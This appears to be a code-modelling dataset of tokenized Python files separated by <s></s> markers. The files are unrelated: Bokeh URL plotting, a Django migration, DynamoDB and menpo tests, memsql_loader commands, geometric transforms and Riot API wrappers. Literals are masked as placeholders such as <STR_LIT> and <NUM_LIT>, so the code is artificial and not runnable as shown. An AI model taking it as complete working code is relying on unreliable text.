"""<STR_LIT>""" <EOL> for i in range ( <NUM_LIT> ) : <EOL> try : <EOL> m = self . queue . get ( block = True , timeout = <NUM_LIT:1> ) <EOL> self . parse_message ( m ) <EOL> except Empty : <EOL> break <EOL> self . plot_urls ( ) <EOL> def parse_message ( self , message ) : <EOL> """<STR_LIT>""" <EOL> print ( message . body ) <EOL> message = json . loads ( message . body ) <EOL> url = message [ "<STR_LIT:url>" ] <EOL> if message [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> self . open_urls [ url ] = NutchUrlTrails . jtime_to_datetime ( message [ "<STR_LIT>" ] ) <EOL> elif message [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> if url in self . open_urls : <EOL> self . closed_urls [ url ] = ( self . open_urls [ url ] , NutchUrlTrails . jtime_to_datetime ( message [ "<STR_LIT>" ] ) ) <EOL> del self . open_urls [ url ] <EOL> else : <EOL> pass <EOL> else : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> def plot_urls ( self ) : <EOL> """<STR_LIT>""" <EOL> self . session . load_document ( self . document ) <EOL> plot = self . document . context . children [ <NUM_LIT:0> ] <EOL> if not ( self . open_urls or self . closed_urls ) : <EOL> return <EOL> x0 = [ ] <EOL> x = [ ] <EOL> urls = [ ] <EOL> circles = [ ] <EOL> circle_urls = [ ] <EOL> current_time = np . datetime64 ( datetime . now ( ) ) <EOL> for url , start_t in self . open_urls . items ( ) : <EOL> url = NutchUrlTrails . strip_url ( url ) <EOL> x0 . append ( start_t ) <EOL> x . append ( current_time ) <EOL> urls . append ( url ) <EOL> for url , ( start_t , end_t ) in self . closed_urls . items ( ) : <EOL> url = NutchUrlTrails . strip_url ( url ) <EOL> x0 . append ( start_t ) <EOL> x . append ( end_t ) <EOL> circles . append ( end_t ) <EOL> urls . append ( url ) <EOL> circle_urls . append ( url ) <EOL> x0 = np . asarray ( x0 ) <EOL> x = np . asarray ( x ) <EOL> circles = np . asarray ( circles ) <EOL> sort_index = np . argsort ( x0 ) [ : : - <NUM_LIT:1> ] <EOL> x0 = x0 [ sort_index ] <EOL> x = x [ sort_index ] <EOL> urls = [ urls [ i ] for i in sort_index ] <EOL> if self . closed_urls : <EOL> circle_sort_index = np . argsort ( circles ) [ : : - <NUM_LIT:1> ] <EOL> circles = circles [ circle_sort_index ] <EOL> circle_urls = [ circle_urls [ i ] for i in circle_sort_index ] <EOL> active_x0 = x0 [ : self . num_urls ] <EOL> active_x = x [ : self . num_urls ] <EOL> active_urls = urls [ : self . num_urls ] <EOL> min_x = min ( active_x0 ) <EOL> plot . x_range . start = min_x <EOL> plot . x_range . end = np . datetime64 ( datetime . now ( ) ) <EOL> plot . y_range . factors = active_urls <EOL> for r in plot . renderers : <EOL> if type ( r ) == Grid : <EOL> r . grid_line_color = '<STR_LIT>' <EOL> break <EOL> plot . right [ <NUM_LIT:0> ] . minor_tick_line_color = '<STR_LIT>' <EOL> plot . right [ <NUM_LIT:0> ] . major_tick_line_color = '<STR_LIT>' <EOL> plot . right [ <NUM_LIT:0> ] . major_label_text_font_size = '<STR_LIT>' <EOL> plot . below [ <NUM_LIT:0> ] . minor_tick_line_color = '<STR_LIT>' <EOL> plot . below [ <NUM_LIT:0> ] . major_tick_line_color = '<STR_LIT>' <EOL> plot . below [ <NUM_LIT:0> ] . major_label_text_font_size = '<STR_LIT>' <EOL> if self . old_circles : <EOL> plot . renderers . pop ( ) <EOL> self . old_circles = None <EOL> if self . old_segments : <EOL> plot . renderers . pop ( ) <EOL> self . old_segments = None <EOL> segment_source = ColumnDataSource ( dict ( x0 = active_x0 , <EOL> x1 = active_x , <EOL> urls = active_urls ) ) <EOL> self . old_segments = Segment ( x0 = "<STR_LIT>" , y0 = "<STR_LIT>" , x1 = "<STR_LIT>" , y1 = "<STR_LIT>" , line_color = "<STR_LIT>" , line_width = <NUM_LIT:10> ) <EOL> plot . add_glyph ( segment_source , self . old_segments ) <EOL> if self . closed_urls and PLOT_CIRCLES : <EOL> active_circles = circles [ : self . num_urls ] <EOL> active_circle_urls = circle_urls [ : self . num_urls ] <EOL> circle_source = ColumnDataSource ( dict ( x = active_circles , urls = active_circle_urls ) ) <EOL> self . old_circles = Circle ( x = "<STR_LIT:x>" , y = "<STR_LIT>" , size = <NUM_LIT:12> , fill_color = "<STR_LIT>" , line_color = "<STR_LIT>" , line_width = <NUM_LIT:2> ) <EOL> plot . add_glyph ( circle_source , self . old_circles ) <EOL> self . session . store_document ( self . document , dirty_only = False ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . IntegerField ( default = <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT>' , models . OneToOneField ( null = True , default = None , blank = True , to = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:index>' , models . OneToOneField ( null = True , default = None , blank = True , to = '<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import gludb . config <EOL> from simple_data_tests import SimpleStorage , DefaultStorageTesting <EOL> from index_tests import IndexReadWriteTesting , IndexedData <EOL> class SpecificStorageTesting ( DefaultStorageTesting ) : <EOL> def setUp ( self ) : <EOL> gludb . config . default_database ( None ) <EOL> gludb . config . class_database ( SimpleStorage , gludb . config . Database ( <EOL> '<STR_LIT>' <EOL> ) ) <EOL> SimpleStorage . ensure_table ( ) <EOL> def tearDown ( self ) : <EOL> gludb . backends . dynamodb . delete_table ( <EOL> SimpleStorage . get_table_name ( ) <EOL> ) <EOL> gludb . config . clear_database_config ( ) <EOL> class DynamoDBIndexReadWriteTesting ( IndexReadWriteTesting ) : <EOL> def setUp ( self ) : <EOL> gludb . config . default_database ( gludb . config . Database ( '<STR_LIT>' ) ) <EOL> IndexedData . ensure_table ( ) <EOL> def tearDown ( self ) : <EOL> gludb . backends . dynamodb . delete_table ( <EOL> IndexedData . get_table_name ( ) <EOL> ) <EOL> gludb . config . clear_database_config ( ) </s>
<s> import sys , datetime <EOL> from clark . super_enum import SuperEnum <EOL> from memsql_loader . util . command import Command <EOL> from memsql_loader . util import log , super_json as json <EOL> from memsql_loader . api import exceptions <EOL> from memsql_loader . api . job import Job as JobApi <EOL> from memsql_loader . api . tasks import Tasks as TasksApi <EOL> class Job ( Command ) : <EOL> @ staticmethod <EOL> def configure ( parser , subparsers ) : <EOL> subparser = subparsers . add_parser ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> subparser . set_defaults ( command = Job ) <EOL> subparser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> subparser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> def run ( self ) : <EOL> self . logger = log . get_logger ( '<STR_LIT>' ) <EOL> self . job_api = JobApi ( ) <EOL> self . tasks_api = TasksApi ( ) <EOL> try : <EOL> result = self . job_api . query ( { '<STR_LIT>' : self . options . job_id } ) <EOL> except exceptions . ApiException as e : <EOL> print e . message <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if self . options . spec : <EOL> print json . dumps ( result . spec , sort_keys = True , indent = <NUM_LIT:4> * '<STR_LIT:U+0020>' ) <EOL> else : <EOL> try : <EOL> finished_tasks = self . tasks_api . query ( { <EOL> '<STR_LIT>' : self . options . job_id , <EOL> '<STR_LIT:state>' : '<STR_LIT>' <EOL> } ) <EOL> except exceptions . ApiException as e : <EOL> print e . message <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> files_loaded = len ( finished_tasks ) <EOL> rows_loaded = reduce ( lambda x , y : x + y . get ( '<STR_LIT:data>' , { } ) . get ( '<STR_LIT>' , <NUM_LIT:0> ) , finished_tasks , <NUM_LIT:0> ) <EOL> avg_rows_per_file = None <EOL> avg_rows_per_second = None <EOL> if files_loaded > <NUM_LIT:0> : <EOL> avg_rows_per_file = rows_loaded / files_loaded <EOL> min_start_time = datetime . datetime . max <EOL> max_stop_time = datetime . datetime . min <EOL> for row in finished_tasks : <EOL> for step in row . steps : <EOL> if step [ '<STR_LIT:name>' ] == '<STR_LIT>' : <EOL> min_start_time = min ( min_start_time , step [ '<STR_LIT:start>' ] ) <EOL> max_stop_time = max ( max_stop_time , step [ '<STR_LIT>' ] ) <EOL> break <EOL> else : <EOL> continue <EOL> avg_rows_per_second = rows_loaded / ( max_stop_time - min_start_time ) . total_seconds ( ) <EOL> result [ '<STR_LIT>' ] = { k : v for k , v in { <EOL> '<STR_LIT>' : files_loaded , <EOL> '<STR_LIT>' : rows_loaded , <EOL> '<STR_LIT>' : avg_rows_per_file , <EOL> '<STR_LIT>' : avg_rows_per_second <EOL> } . iteritems ( ) if v is not None } <EOL> if result . tasks_total > <NUM_LIT:0> : <EOL> result [ '<STR_LIT>' ] . update ( { <EOL> '<STR_LIT>' : result . tasks_succeeded * <NUM_LIT:1.0> / result . tasks_total , <EOL> '<STR_LIT>' : result . tasks_errored * <NUM_LIT:1.0> / result . tasks_total <EOL> } ) <EOL> result [ "<STR_LIT>" ] = result . spec [ "<STR_LIT:target>" ] [ "<STR_LIT>" ] <EOL> result [ "<STR_LIT>" ] = result . spec [ "<STR_LIT:target>" ] [ "<STR_LIT>" ] <EOL> result = dict ( result ) <EOL> del result [ '<STR_LIT>' ] <EOL> result = { k : str ( v ) if isinstance ( v , SuperEnum . Element ) else v for k , v in result . iteritems ( ) } <EOL> print json . dumps ( result , sort_keys = True , indent = <NUM_LIT:4> * '<STR_LIT:U+0020>' ) </s>
<s> from memsql_loader . util import apsw_helpers <EOL> class TableDefinition ( object ) : <EOL> def __init__ ( self , table_name , sql , index_columns = None ) : <EOL> self . table_name = table_name <EOL> self . sql = sql <EOL> self . index_columns = index_columns or [ ] <EOL> class APSWSQLUtility ( object ) : <EOL> def __init__ ( self , storage ) : <EOL> self . storage = storage <EOL> self . _tables = { } <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . storage . transaction ( ) as cursor : <EOL> for table_defn in self . _tables . values ( ) : <EOL> cursor . execute ( table_defn . sql ) <EOL> for index_column in table_defn . index_columns : <EOL> index_name = table_defn . table_name + '<STR_LIT:_>' + index_column + '<STR_LIT>' <EOL> cursor . execute ( <EOL> '<STR_LIT>' % <EOL> ( index_name , table_defn . table_name , index_column ) ) <EOL> return self <EOL> def ready ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . storage . cursor ( ) as cursor : <EOL> rows = apsw_helpers . query ( <EOL> cursor , '<STR_LIT>' ) <EOL> tables = [ row . name for row in rows ] <EOL> return all ( [ table_name in tables for table_name in self . _tables ] ) <EOL> def _define_table ( self , table_definition ) : <EOL> self . _tables [ table_definition . table_name ] = table_definition </s>
<s> import ref_prettify </s>
<s> import numpy as np <EOL> from nose . tools import raises <EOL> from numpy . testing import assert_allclose <EOL> from menpo . shape import PointCloud <EOL> from menpo . image import MaskedImage , BooleanImage <EOL> def test_constrain_mask_to_landmarks_pwa ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , [ <NUM_LIT> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.0> , <NUM_LIT> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( group = '<STR_LIT>' ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> def test_constrain_mask_to_landmarks_pwa_batched ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , [ <NUM_LIT> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.0> , <NUM_LIT> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( group = '<STR_LIT>' , batch_size = <NUM_LIT:2> ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> def test_constrain_mask_to_landmarks_convex_hull ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.> , <NUM_LIT> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( group = '<STR_LIT>' , <EOL> point_in_pointcloud = '<STR_LIT>' ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , <NUM_LIT:1> : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT:30> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> def test_constrain_mask_to_landmarks_callable ( ) : <EOL> def bounding_box ( _ , indices ) : <EOL> return np . ones ( indices . shape [ <NUM_LIT:0> ] , dtype = np . bool ) <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> ] , [ <NUM_LIT> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT:0.> , <NUM_LIT> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( group = '<STR_LIT>' , <EOL> point_in_pointcloud = bounding_box ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> assert ( img . mask . n_true ( ) == <NUM_LIT> ) <EOL> assert_allclose ( img . mask . pixels , example_mask . pixels ) <EOL> @ raises ( ValueError ) <EOL> def test_constrain_mask_to_landmarks_non_2d ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( ) <EOL> @ raises ( ValueError ) <EOL> def test_constrain_mask_to_landmarks_unknown_key ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img . landmarks [ '<STR_LIT>' ] = PointCloud ( np . array ( [ [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) ) <EOL> img . constrain_mask_to_landmarks ( point_in_pointcloud = '<STR_LIT>' ) <EOL> def test_erode ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img2 = img . erode ( ) <EOL> assert ( img2 . mask . n_true ( ) == <NUM_LIT:64> ) <EOL> img3 = img . erode ( n_pixels = <NUM_LIT:3> ) <EOL> assert ( img3 . mask . n_true ( ) == <NUM_LIT:16> ) <EOL> def test_dilate ( ) : <EOL> img = MaskedImage . init_blank ( ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> img = img . erode ( n_pixels = <NUM_LIT:3> ) <EOL> img2 = img . dilate ( ) <EOL> assert ( img2 . mask . n_true ( ) == <NUM_LIT:32> ) <EOL> img3 = img . dilate ( n_pixels = <NUM_LIT:3> ) <EOL> assert ( img3 . mask . n_true ( ) == <NUM_LIT> ) <EOL> def test_init_from_rolled_channels ( ) : <EOL> p = np . empty ( [ <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT:3> ] ) <EOL> im = MaskedImage . init_from_rolled_channels ( p ) <EOL> assert im . n_channels == <NUM_LIT:3> <EOL> assert im . height == <NUM_LIT:50> <EOL> assert im . width == <NUM_LIT> <EOL> def test_init_from_rolled_channels_masked ( ) : <EOL> p = np . empty ( [ <NUM_LIT:50> , <NUM_LIT> , <NUM_LIT:3> ] ) <EOL> example_mask = BooleanImage . init_blank ( ( <NUM_LIT:50> , <NUM_LIT> ) , fill = False ) <EOL> example_mask . pixels [ <NUM_LIT:0> , : <NUM_LIT:6> , : <NUM_LIT:6> ] = True <EOL> im = MaskedImage . init_from_rolled_channels ( p , mask = example_mask ) <EOL> assert im . n_channels == <NUM_LIT:3> <EOL> assert im . height == <NUM_LIT:50> <EOL> assert im . width == <NUM_LIT> <EOL> assert im . mask . n_true ( ) == <NUM_LIT> </s>
<s> from . base import LandmarkGroup , LandmarkManager , Landmarkable <EOL> from . exceptions import LabellingError <EOL> from . labels import * </s>
<s> from . pointcloud import PointCloud , bounding_box <EOL> from . mesh import TriMesh , ColouredTriMesh , TexturedTriMesh <EOL> from . groupops import mean_pointcloud <EOL> from . graph import ( UndirectedGraph , DirectedGraph , Tree , PointUndirectedGraph , <EOL> PointDirectedGraph , PointTree ) <EOL> from . graph_predefined import ( empty_graph , star_graph , complete_graph , <EOL> chain_graph , delaunay_graph ) </s>
<s> import numpy as np <EOL> from . base import Homogeneous , HomogFamilyAlignment <EOL> from functools import reduce <EOL> class Affine ( Homogeneous ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , h_matrix , copy = True , skip_checks = False ) : <EOL> Homogeneous . __init__ ( self , h_matrix , copy = copy , <EOL> skip_checks = skip_checks ) <EOL> @ classmethod <EOL> def init_identity ( cls , n_dims ) : <EOL> r"""<STR_LIT>""" <EOL> return cls ( np . eye ( n_dims + <NUM_LIT:1> ) , copy = False , skip_checks = True ) <EOL> @ property <EOL> def h_matrix ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . _h_matrix <EOL> def _set_h_matrix ( self , value , copy = True , skip_checks = False ) : <EOL> r"""<STR_LIT>""" <EOL> if not skip_checks : <EOL> shape = value . shape <EOL> if len ( shape ) != <NUM_LIT:2> or shape [ <NUM_LIT:0> ] != shape [ <NUM_LIT:1> ] : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . h_matrix is not None : <EOL> if self . n_dims != shape [ <NUM_LIT:0> ] - <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if shape [ <NUM_LIT:0> ] - <NUM_LIT:1> not in [ <NUM_LIT:2> , <NUM_LIT:3> ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if not ( np . allclose ( value [ - <NUM_LIT:1> , : - <NUM_LIT:1> ] , <NUM_LIT:0> ) and <EOL> np . allclose ( value [ - <NUM_LIT:1> , - <NUM_LIT:1> ] , <NUM_LIT:1> ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if copy : <EOL> value = value . copy ( ) <EOL> self . _h_matrix = value <EOL> @ property <EOL> def linear_component ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . h_matrix [ : - <NUM_LIT:1> , : - <NUM_LIT:1> ] <EOL> @ property <EOL> def translation_component ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . h_matrix [ : - <NUM_LIT:1> , - <NUM_LIT:1> ] <EOL> def decompose ( self ) : <EOL> r"""<STR_LIT>""" <EOL> from . rotation import Rotation <EOL> from . translation import Translation <EOL> from . scale import Scale <EOL> U , S , V = np . linalg . svd ( self . linear_component ) <EOL> rotation_2 = Rotation ( U ) <EOL> rotation_1 = Rotation ( V ) <EOL> scale = Scale ( S ) <EOL> translation = Translation ( self . translation_component ) <EOL> return [ rotation_1 , scale , rotation_2 , translation ] <EOL> def _transform_str ( self ) : <EOL> r"""<STR_LIT>""" <EOL> header = '<STR_LIT>' <EOL> list_str = [ t . _transform_str ( ) for t in self . decompose ( ) ] <EOL> return header + reduce ( lambda x , y : x + '<STR_LIT:\n>' + '<STR_LIT:U+0020>' + y , list_str , '<STR_LIT:U+0020>' ) <EOL> def _apply ( self , x , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> return np . dot ( x , self . linear_component . T ) + self . translation_component <EOL> @ property <EOL> def n_parameters ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return self . n_dims * ( self . n_dims + <NUM_LIT:1> ) <EOL> def _as_vector ( self ) : <EOL> r"""<STR_LIT>""" <EOL> params = self . h_matrix - np . eye ( self . n_dims + <NUM_LIT:1> ) <EOL> return params [ : self . n_dims , : ] . ravel ( order = '<STR_LIT:F>' ) <EOL> def _from_vector_inplace ( self , p ) : <EOL> r"""<STR_LIT>""" <EOL> h_matrix = None <EOL> if p . shape [ <NUM_LIT:0> ] == <NUM_LIT:6> : <EOL> h_matrix = np . eye ( <NUM_LIT:3> ) <EOL> h_matrix [ : <NUM_LIT:2> , : ] += p . reshape ( ( <NUM_LIT:2> , <NUM_LIT:3> ) , order = '<STR_LIT:F>' ) <EOL> elif p . shape [ <NUM_LIT:0> ] == <NUM_LIT:12> : <EOL> h_matrix = np . eye ( <NUM_LIT:4> ) <EOL> h_matrix [ : <NUM_LIT:3> , : ] += p . reshape ( ( <NUM_LIT:3> , <NUM_LIT:4> ) , order = '<STR_LIT:F>' ) <EOL> else : <EOL> ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _set_h_matrix ( h_matrix , copy = False , skip_checks = True ) <EOL> @ property <EOL> def composes_inplace_with ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return Affine <EOL> class AlignmentAffine ( HomogFamilyAlignment , Affine ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , source , target ) : <EOL> HomogFamilyAlignment . __init__ ( self , source , target ) <EOL> optimal_h = self . _build_alignment_h_matrix ( source , target ) <EOL> Affine . __init__ ( self , optimal_h , copy = False , skip_checks = True ) <EOL> @ staticmethod <EOL> def _build_alignment_h_matrix ( source , target ) : <EOL> r"""<STR_LIT>""" <EOL> a = source . h_points ( ) <EOL> b = target . h_points ( ) <EOL> return np . linalg . solve ( np . dot ( a , a . T ) , np . dot ( a , b . T ) ) . T <EOL> def _set_h_matrix ( self , value , copy = True , skip_checks = False ) : <EOL> r"""<STR_LIT>""" <EOL> Affine . _set_h_matrix ( self , value , copy = copy , skip_checks = skip_checks ) <EOL> self . _sync_target_from_state ( ) <EOL> def _sync_state_from_target ( self ) : <EOL> optimal_h = self . _build_alignment_h_matrix ( self . source , self . target ) <EOL> Affine . _set_h_matrix ( self , optimal_h , copy = False , skip_checks = True ) <EOL> def as_non_alignment ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return Affine ( self . h_matrix , skip_checks = True ) <EOL> class DiscreteAffine ( object ) : <EOL> r"""<STR_LIT>""" <EOL> def decompose ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return [ self . copy ( ) ] </s>
<s> import numpy as np <EOL> from . base import Transform , Alignment , Invertible <EOL> from . rbf import R2LogR2RBF <EOL> class ThinPlateSplines ( Alignment , Transform , Invertible ) : <EOL> r"""<STR_LIT>""" <EOL> def __init__ ( self , source , target , kernel = None , min_singular_val = <NUM_LIT> ) : <EOL> Alignment . __init__ ( self , source , target ) <EOL> if self . n_dims != <NUM_LIT:2> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if kernel is None : <EOL> kernel = R2LogR2RBF ( source . points ) <EOL> self . min_singular_val = min_singular_val <EOL> self . kernel = kernel <EOL> self . k = self . kernel . apply ( self . source . points ) <EOL> self . p = np . concatenate ( <EOL> [ np . ones ( [ self . n_points , <NUM_LIT:1> ] ) , self . source . points ] , axis = <NUM_LIT:1> ) <EOL> o = np . zeros ( [ <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> top_l = np . concatenate ( [ self . k , self . p ] , axis = <NUM_LIT:1> ) <EOL> bot_l = np . concatenate ( [ self . p . T , o ] , axis = <NUM_LIT:1> ) <EOL> self . l = np . concatenate ( [ top_l , bot_l ] , axis = <NUM_LIT:0> ) <EOL> self . v , self . y , self . coefficients = None , None , None <EOL> self . _build_coefficients ( ) <EOL> def _build_coefficients ( self ) : <EOL> self . v = self . target . points . T . copy ( ) <EOL> self . y = np . hstack ( [ self . v , np . zeros ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ] ) <EOL> _u , _s , _v = np . linalg . svd ( self . l ) <EOL> keep = _s . shape [ <NUM_LIT:0> ] - sum ( _s < self . min_singular_val ) <EOL> inv_l = _u [ : , : keep ] . dot ( <NUM_LIT:1.0> / _s [ : keep , None ] * _v [ : keep , : ] ) <EOL> self . coefficients = inv_l . dot ( self . y . T ) <EOL> def _sync_state_from_target ( self ) : <EOL> self . _build_coefficients ( ) <EOL> def _apply ( self , points , ** kwargs ) : <EOL> r"""<STR_LIT>""" <EOL> if points . shape [ <NUM_LIT:1> ] != self . n_dims : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> x = points [ ... , <NUM_LIT:0> ] [ : , None ] <EOL> y = points [ ... , <NUM_LIT:1> ] [ : , None ] <EOL> c_affine_c = self . coefficients [ - <NUM_LIT:3> ] <EOL> c_affine_x = self . coefficients [ - <NUM_LIT:2> ] <EOL> c_affine_y = self . coefficients [ - <NUM_LIT:1> ] <EOL> f_affine = c_affine_c + c_affine_x * x + c_affine_y * y <EOL> kernel_dist = self . kernel . apply ( points ) <EOL> c_affine_free = self . coefficients [ : - <NUM_LIT:3> ] <EOL> f_affine_free = kernel_dist . dot ( c_affine_free ) <EOL> return f_affine + f_affine_free <EOL> @ property <EOL> def has_true_inverse ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return False <EOL> def pseudoinverse ( self ) : <EOL> r"""<STR_LIT>""" <EOL> return ThinPlateSplines ( self . target , self . source , kernel = self . kernel ) </s>
<s> import cassiopeia . dto . requests <EOL> import cassiopeia . type . core . common <EOL> import cassiopeia . type . dto . currentgame <EOL> import cassiopeia . type . api . exception <EOL> def get_current_game ( summoner_id ) : <EOL> """<STR_LIT>""" <EOL> region = cassiopeia . type . core . common . Region ( cassiopeia . dto . requests . region ) <EOL> platform = cassiopeia . type . core . common . Platform [ region . name ] <EOL> request = "<STR_LIT>" . format ( server = cassiopeia . dto . requests . region , platform = platform . value , summoner_id = summoner_id ) <EOL> try : <EOL> return cassiopeia . type . dto . currentgame . CurrentGameInfo ( cassiopeia . dto . requests . get ( request , include_base = False ) ) <EOL> except cassiopeia . type . api . exception . APIError as e : <EOL> if e . error_code == <NUM_LIT> : <EOL> return None <EOL> raise e </s>
<s> import datetime <EOL> import cassiopeia . type . core . common <EOL> import cassiopeia . type . dto . status <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Shard ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Shard <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> @ property <EOL> def host_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . hostname <EOL> @ property <EOL> def locales ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . locales <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . name <EOL> @ property <EOL> def platform ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . Platform ( self . data . region_tag . upper ( ) ) if self . data . region_tag else None <EOL> @ property <EOL> def region ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . Region ( self . data . slug . upper ( ) ) if self . data . slug else None <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class ShardStatus ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . ShardStatus <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( name = self . name ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . services ) <EOL> def __len__ ( self ) : <EOL> return len ( self . services ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . services [ index ] <EOL> @ property <EOL> def host_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . hostname <EOL> @ property <EOL> def locales ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . locales <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . name <EOL> @ property <EOL> def platform ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . Platform ( self . data . region_tag . 